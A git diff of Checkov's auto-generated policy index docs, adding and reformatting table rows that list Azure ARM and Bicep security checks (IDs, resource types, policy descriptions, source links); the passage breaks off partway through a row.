+| 155 | CKV_AZURE_176 | resource | Microsoft.SignalRService/webPubSub | Ensure Web PubSub uses managed identities to access Azure resources | arm | 
[PubsubSpecifyIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PubsubSpecifyIdentity.py) |
+| 156 | CKV_AZURE_177 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure Windows VM enables automatic updates | arm | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMAutomaticUpdates.py) |
+| 157 | CKV_AZURE_177 | resource | Microsoft.Compute/virtualMachines | Ensure Windows VM enables automatic updates | arm | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMAutomaticUpdates.py) |
+| 158 | CKV_AZURE_178 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure linux VM enables SSH with keys for secure communication | arm | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/LinuxVMUsesSSH.py) |
+| 159 | CKV_AZURE_178 | resource | Microsoft.Compute/virtualMachines | Ensure linux VM enables SSH with keys for secure communication | arm | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/LinuxVMUsesSSH.py) |
+| 160 | CKV_AZURE_182 | resource | Microsoft.Network/networkInterfaces | Ensure that VNET has at least 2 connected DNS Endpoints | arm | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VnetSingleDNSServer.py) |
+| 161 | CKV_AZURE_182 | resource | Microsoft.Network/virtualNetworks | Ensure that VNET has at least 2 connected DNS Endpoints | arm | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VnetSingleDNSServer.py) |
+| 162 | CKV_AZURE_183 | resource | Microsoft.Network/virtualNetworks | Ensure that VNET uses local DNS addresses | arm | [VnetLocalDNS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VnetLocalDNS.py) |
+| 163 | CKV_AZURE_189 | resource | 
Microsoft.KeyVault/vaults | Ensure that Azure Key Vault disables public network access | arm | [KeyVaultDisablesPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultDisablesPublicNetworkAccess.py) |
+| 164 | CKV_AZURE_191 | resource | Microsoft.EventGrid/topics | Ensure that Managed identity provider is enabled for Azure Event Grid Topic | arm | [EventgridTopicIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/EventgridTopicIdentityProviderEnabled.py) |
+| 165 | CKV_AZURE_192 | resource | Microsoft.EventGrid/topics | Ensure that Azure Event Grid Topic local Authentication is disabled | arm | [EventgridTopicLocalAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/EventgridTopicLocalAuthentication.py) |
+| 166 | CKV_AZURE_193 | resource | Microsoft.EventGrid/topics | Ensure public network access is disabled for Azure Event Grid Topic | arm | [EventgridTopicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/EventgridTopicNetworkAccess.py) |
+| 167 | CKV_AZURE_206 | resource | Microsoft.Storage/storageAccounts | Ensure that Storage Accounts use replication | arm | [StorageAccountsUseReplication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountsUseReplication.py) |
+| 168 | CKV_AZURE_208 | resource | Microsoft.Search/searchServices | Ensure that Azure Cognitive Search maintains SLA for index updates | arm | [AzureSearchSLAIndex.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureSearchSLAIndex.py) |
+| 169 | CKV_AZURE_209 | resource | Microsoft.Search/searchServices | Ensure that Azure Cognitive Search maintains SLA for search index queries | arm | [AzureSearchSLAQueryUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureSearchSLAQueryUpdates.py) |
+| 
170 | CKV_AZURE_212 | resource | Microsoft.Web/sites | Ensure App Service has a minimum number of instances for failover | arm | [AppServiceInstanceMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceInstanceMinimum.py) | +| 171 | CKV_AZURE_212 | resource | Microsoft.Web/sites/slots | Ensure App Service has a minimum number of instances for failover | arm | [AppServiceInstanceMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceInstanceMinimum.py) | +| 172 | CKV_AZURE_213 | resource | Microsoft.Web/sites | Ensure that App Service configures health check | arm | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSetHealthCheck.py) | +| 173 | CKV_AZURE_213 | resource | Microsoft.Web/sites/slots | Ensure that App Service configures health check | arm | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSetHealthCheck.py) | +| 174 | CKV_AZURE_216 | resource | Microsoft.Network/azureFirewalls | Ensure DenyIntelMode is set to Deny for Azure Firewalls | arm | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFirewallDenyThreatIntelMode.py) | +| 175 | CKV_AZURE_218 | resource | Microsoft.Network/applicationGateways | Ensure Application Gateway defines secure protocols for in transit communication | arm | [AppGWDefinesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppGWDefinesSecureProtocols.py) | +| 176 | CKV_AZURE_222 | resource | Microsoft.Web/sites | Ensure that Azure Web App public network access is disabled | arm | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePublicAccessDisabled.py) | +| 177 | CKV_AZURE_222 | resource | 
Microsoft.Web/sites/config | Ensure that Azure Web App public network access is disabled | arm | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePublicAccessDisabled.py) | +| 178 | CKV_AZURE_222 | resource | Microsoft.Web/sites/slots | Ensure that Azure Web App public network access is disabled | arm | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePublicAccessDisabled.py) | +| 179 | CKV_AZURE_223 | resource | Microsoft.EventHub/namespaces | Ensure Event Hub Namespace uses at least TLS 1.2 | arm | [EventHubNamespaceMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/EventHubNamespaceMinTLS12.py) | +| 180 | CKV_AZURE_225 | resource | Microsoft.Web/serverfarms | Ensure the App Service Plan is zone redundant | arm | [AppServicePlanZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePlanZoneRedundant.py) | +| 181 | CKV_AZURE_226 | resource | Microsoft.ContainerService/managedClusters | Ensure ephemeral disks are used for OS disks | arm | [AKSEphemeralOSDisks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSEphemeralOSDisks.py) | +| 182 | CKV_AZURE_227 | resource | Microsoft.ContainerService/managedClusters | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources | arm | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSEncryptionAtHostEnabled.py) | +| 183 | CKV_AZURE_227 | resource | Microsoft.ContainerService/managedClusters/agentPools | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources | arm | 
[AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSEncryptionAtHostEnabled.py) | +| 184 | CKV_AZURE_229 | resource | Microsoft.Sql/servers/databases | Ensure the Azure SQL Database Namespace is zone redundant | arm | [SQLDatabaseZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLDatabaseZoneRedundant.py) | +| 185 | CKV_AZURE_233 | resource | Microsoft.ContainerRegistry/registries | Ensure Azure Container Registry (ACR) is zone redundant | arm | [ACREnableZoneRedundancy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACREnableZoneRedundancy.py) | +| 186 | CKV_AZURE_233 | resource | Microsoft.ContainerRegistry/registries/replications | Ensure Azure Container Registry (ACR) is zone redundant | arm | [ACREnableZoneRedundancy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACREnableZoneRedundancy.py) | +| 187 | CKV_AZURE_236 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services accounts disable local authentication | arm | [CognitiveServicesEnableLocalAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesEnableLocalAuth.py) | +| 188 | CKV_AZURE_238 | resource | Microsoft.CognitiveServices/accounts | Ensure that all Azure Cognitive Services accounts are configured with a managed identity | arm | [CognitiveServicesConfigureIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesConfigureIdentity.py) | +| 189 | CKV_AZURE_239 | resource | Microsoft.Synapse/workspaces | Ensure Azure Synapse Workspace administrator login password is not exposed | arm | [SynapseWorkspaceAdministratorLoginPasswordHidden.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceAdministratorLoginPasswordHidden.py) | +| 190 | CKV_AZURE_240 | resource | 
Microsoft.Synapse/workspaces | Ensure Azure Synapse Workspace is encrypted with a CMK | arm | [SynapseWorkspaceCMKEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceCMKEncryption.py) | +| 191 | CKV_AZURE_242 | resource | Microsoft.Synapse/workspaces/bigDataPools | Ensure isolated compute is enabled for Synapse Spark pools | arm | [AzureSparkPoolIsolatedComputeEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureSparkPoolIsolatedComputeEnabled.py) | +| 192 | CKV_AZURE_243 | resource | Microsoft.MachineLearningServices/workspaces | Ensure Azure Machine learning workspace is configured with private endpoint | arm | [AzureMLWorkspacePrivateEndpoint.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureMLWorkspacePrivateEndpoint.py) | +| 193 | CKV2_AZURE_19 | resource | Microsoft.Synapse/workspaces | Ensure that Azure Synapse workspaces have no IP firewall rules attached | arm | [AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.py) | +| 194 | CKV2_AZURE_23 | resource | Microsoft.AppPlatform/Spring | Ensure Azure spring cloud is configured with Virtual network (Vnet) | arm | [AzureSpringCloudConfigWithVnet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/graph_checks/AzureSpringCloudConfigWithVnet.yaml) | +| 195 | CKV2_AZURE_27 | resource | Microsoft.Sql/servers | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL) | arm | [SQLServerUsesADAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerUsesADAuth.py) | +| 196 | CKV2_AZURE_46 | resource | Microsoft.Synapse/workspaces/vulnerabilityAssessments | Ensure that Azure Synapse Workspace vulnerability assessment is enabled | arm | 
[AzureSynapseWorkspaceVAisEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureSynapseWorkspaceVAisEnabled.py) | +| 197 | CKV2_AZURE_48 | resource | Microsoft.Databricks/workspaces | Ensure that Databricks Workspaces enables customer-managed key for root DBFS encryption | arm | [DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py) | +| 198 | CKV2_AZURE_49 | resource | Microsoft.MachineLearningServices/workspaces | Ensure that Azure Machine learning workspace is not configured with overly permissive network access | arm | [AzureMLWorkspacePublicNetwork.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/graph_checks/AzureMLWorkspacePublicNetwork.yaml) | --- diff --git a/docs/5.Policy Index/bicep.md b/docs/5.Policy Index/bicep.md index 190f90f7f33..c16568748db 100644 --- a/docs/5.Policy Index/bicep.md +++ b/docs/5.Policy Index/bicep.md 
@@ -6,104 +6,208 @@ nav_order: 1 # bicep resource scans (auto generated) -| | Id | Type | Entity | Policy | IaC | Resource Link | -|----|---------------|-----------|------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------|-------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| 0 | CKV_AZURE_1 | resource | Microsoft.Compute/virtualMachines | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | Bicep | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstancePassword.py) | -| 1 | CKV_AZURE_2 | resource | Microsoft.Compute/disks | Ensure Azure managed disk have encryption enabled | Bicep | [AzureManagedDiscEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiscEncryption.py) | -| 2 | CKV_AZURE_3 | resource | Microsoft.Storage/storageAccounts | Ensure that 'supportsHttpsTrafficOnly' is set to 'true' | Bicep | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountsTransportEncryption.py) | -| 3 | CKV_AZURE_4 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS logging to Azure Monitoring is Configured | Bicep | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSLoggingEnabled.py) | -| 4 | CKV_AZURE_5 | resource | Microsoft.ContainerService/managedClusters | Ensure RBAC is enabled on AKS clusters | Bicep | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSRbacEnabled.py) | -| 5 | CKV_AZURE_6 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS has an 
API Server Authorized IP Ranges enabled | Bicep | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSApiServerAuthorizedIpRanges.py) | -| 6 | CKV_AZURE_7 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS cluster has Network Policy configured | Bicep | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSNetworkPolicy.py) | -| 7 | CKV_AZURE_8 | resource | Microsoft.ContainerService/managedClusters | Ensure Kubernetes Dashboard is disabled | Bicep | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSDashboardDisabled.py) | -| 8 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups | Ensure that RDP access is restricted from the internet | Bicep | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) | -| 9 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that RDP access is restricted from the internet | Bicep | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) | -| 10 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups | Ensure that SSH access is restricted from the internet | Bicep | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) | -| 11 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that SSH access is restricted from the internet | Bicep | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) | -| 12 | CKV_AZURE_11 | resource | Microsoft.Sql/servers | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | 
Bicep | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerNoPublicAccess.py) | -| 13 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | -| 14 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | -| 15 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | -| 16 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | -| 17 | CKV_AZURE_13 | resource | Microsoft.Web/sites/config | Ensure App Service Authentication is set on Azure App Service | Bicep | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) | -| 18 | CKV_AZURE_13 | resource | config | Ensure App Service Authentication is set on Azure App Service | Bicep | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) | -| 19 | CKV_AZURE_14 | resource | 
Microsoft.Web/sites | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Bicep | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHTTPSOnly.py) | -| 20 | CKV_AZURE_15 | resource | Microsoft.Web/sites | Ensure web app is using the latest version of TLS encryption | Bicep | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceMinTLSVersion.py) | -| 21 | CKV_AZURE_16 | resource | Microsoft.Web/sites | Ensure that Register with Azure Active Directory is enabled on App Service | Bicep | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentity.py) | -| 22 | CKV_AZURE_17 | resource | Microsoft.Web/sites | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Bicep | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceClientCertificate.py) | -| 23 | CKV_AZURE_18 | resource | Microsoft.Web/sites | Ensure that 'HTTP Version' is the latest if used to run the web app | Bicep | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttps20Enabled.py) | -| 24 | CKV_AZURE_19 | resource | Microsoft.Security/pricings | Ensure that standard pricing tier is selected | Bicep | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterStandardPricing.py) | -| 25 | CKV_AZURE_20 | resource | Microsoft.Security/securityContacts | Ensure that security contact 'Phone number' is set | Bicep | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactPhone.py) | -| 26 | CKV_AZURE_21 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high 
severity alerts' is set to 'On' | Bicep | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlert.py) | -| 27 | CKV_AZURE_22 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Bicep | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlertAdmins.py) | -| 28 | CKV_AZURE_23 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | -| 29 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/auditingSettings | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | -| 30 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/databases | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | -| 31 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/databases/auditingSettings | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | -| 32 | CKV_AZURE_24 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Bicep | [SQLServerAuditingRetention90Days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingRetention90Days.py) | -| 33 | CKV_AZURE_25 | resource | 
Microsoft.Sql/servers/databases | Ensure that 'Threat Detection types' is set to 'All' | Bicep | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerThreatDetectionTypes.py) | -| 34 | CKV_AZURE_26 | resource | Microsoft.Sql/servers/databases | Ensure that 'Send Alerts To' is enabled for MSSQL servers | Bicep | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsEnabled.py) | -| 35 | CKV_AZURE_27 | resource | Microsoft.Sql/servers/databases | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers | Bicep | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsToAdminsEnabled.py) | -| 36 | CKV_AZURE_28 | resource | Microsoft.DBforMySQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server | Bicep | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerSSLEnforcementEnabled.py) | -| 37 | CKV_AZURE_29 | resource | Microsoft.DBforPostgreSQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server | Bicep | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerSSLEnforcementEnabled.py) | -| 38 | CKV_AZURE_30 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | -| 39 | CKV_AZURE_30 | resource | configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | Bicep | 
[PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | -| 40 | CKV_AZURE_31 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | -| 41 | CKV_AZURE_31 | resource | configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | -| 42 | CKV_AZURE_32 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | -| 43 | CKV_AZURE_32 | resource | configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | -| 44 | CKV_AZURE_33 | resource | Microsoft.Storage/storageAccounts/queueServices/providers/diagnosticsettings | Ensure Storage logging is enabled for Queue service for read, write and delete requests | Bicep | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountLoggingQueueServiceEnabled.py) | -| 45 | CKV_AZURE_34 | resource | Microsoft.Storage/storageAccounts/blobServices/containers | 
Ensure that 'Public access level' is set to Private for blob containers | Bicep | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | -| 46 | CKV_AZURE_34 | resource | blobServices/containers | Ensure that 'Public access level' is set to Private for blob containers | Bicep | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | -| 47 | CKV_AZURE_34 | resource | containers | Ensure that 'Public access level' is set to Private for blob containers | Bicep | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | -| 48 | CKV_AZURE_35 | resource | Microsoft.Storage/storageAccounts | Ensure default network access rule for Storage Accounts is set to deny | Bicep | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py) | -| 49 | CKV_AZURE_36 | resource | Microsoft.Storage/storageAccounts | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | Bicep | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py) | -| 50 | CKV_AZURE_37 | resource | Microsoft.Insights/logprofiles | Ensure that Activity Log Retention is set 365 days or greater | Bicep | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileRetentionDays.py) | -| 51 | CKV_AZURE_38 | resource | Microsoft.Insights/logprofiles | Ensure audit profile captures all the activities | Bicep | 
[MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileCategories.py) | -| 52 | CKV_AZURE_39 | resource | Microsoft.Authorization/roleDefinitions | Ensure that no custom subscription owner roles are created | Bicep | [CustomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CustomRoleDefinitionSubscriptionOwner.py) | -| 53 | CKV_AZURE_40 | resource | Microsoft.KeyVault/vaults/keys | Ensure that the expiration date is set on all keys | Bicep | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyExpirationDate.py) | -| 54 | CKV_AZURE_41 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that the expiration date is set on all secrets | Bicep | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretExpirationDate.py) | -| 55 | CKV_AZURE_42 | resource | Microsoft.KeyVault/vaults | Ensure the key vault is recoverable | Bicep | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyvaultRecoveryEnabled.py) | -| 56 | CKV_AZURE_47 | resource | Microsoft.DBforMariaDB/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers | Bicep | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBSSLEnforcementEnabled.py) | -| 57 | CKV_AZURE_49 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead) | Bicep | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureScaleSetPassword.py) | -| 58 | CKV_AZURE_50 | resource | Microsoft.Compute/virtualMachines | Ensure Virtual Machine Extensions are not Installed | Bicep | 
